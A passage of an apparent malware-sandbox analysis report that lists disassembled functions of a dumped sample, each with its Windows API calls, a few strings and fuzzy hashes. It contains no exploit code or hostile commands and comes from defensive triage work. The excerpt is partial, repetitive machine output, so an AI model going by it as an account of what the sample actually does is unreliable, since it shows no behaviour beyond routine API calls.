                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                              • String ID:
                                                                              • API String ID: 822687973-0
                                                                              • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                              • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                              Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                              • malloc.MSVCRT ref: 00417459
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                              • free.MSVCRT ref: 0041747F
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                              • String ID:
                                                                              • API String ID: 2605342592-0
                                                                              • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                              • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                              Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                              • RegisterClassW.USER32(00000001), ref: 00412428
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                                              • String ID:
                                                                              • API String ID: 2678498856-0
                                                                              • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                              • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                              Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Item
                                                                              • String ID:
                                                                              • API String ID: 3888421826-0
                                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                              Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00417B7B
                                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                                              • String ID:
                                                                              • API String ID: 3727323765-0
                                                                              • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                              • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                              Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040F673
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                              • strlen.MSVCRT ref: 0040F6A2
                                                                              • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                              • String ID:
                                                                              • API String ID: 2754987064-0
                                                                              • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                              • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                              Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040F6E2
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                              • strlen.MSVCRT ref: 0040F70D
                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                              • String ID:
                                                                              • API String ID: 2754987064-0
                                                                              • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                              • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                              Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00402FD7
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                              • strlen.MSVCRT ref: 00403006
                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                              • String ID:
                                                                              • API String ID: 2754987064-0
                                                                              • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                              • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                              Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                              • String ID:
                                                                              • API String ID: 764393265-0
                                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                              Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Time$System$File$LocalSpecific
                                                                              • String ID:
                                                                              • API String ID: 979780441-0
                                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                              Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                              • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$DialogHandleModuleParam
                                                                              • String ID:
                                                                              • API String ID: 1386444988-0
                                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                              Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateMessageRectSend
                                                                              • String ID: d=E
                                                                              • API String ID: 909852535-3703654223
                                                                              • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                              • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                              Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wcschr.MSVCRT ref: 0040F79E
                                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcschr$memcpywcslen
                                                                              • String ID: "
                                                                              • API String ID: 1983396471-123907689
                                                                              • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                              • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                              Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                                              • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer_memicmpmemcpy
                                                                              • String ID: URL
                                                                              • API String ID: 2108176848-3574463123
                                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                              Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _snwprintf.MSVCRT ref: 0040A398
                                                                              • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _snwprintfmemcpy
                                                                              • String ID: %2.2X
                                                                              • API String ID: 2789212964-323797159
                                                                              • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                              • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                              Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _snwprintf
                                                                              • String ID: %%-%d.%ds
                                                                              • API String ID: 3988819677-2008345750
                                                                              • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                              • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                              Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: PlacementWindowmemset
                                                                              • String ID: WinPos
                                                                              • API String ID: 4036792311-2823255486
                                                                              • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                              • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                              Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                              • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??3@DeleteObject
                                                                              • String ID: r!A
                                                                              • API String ID: 1103273653-628097481
                                                                              • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                              • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                              Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                              Download Yara Rule
                                                                              APIs
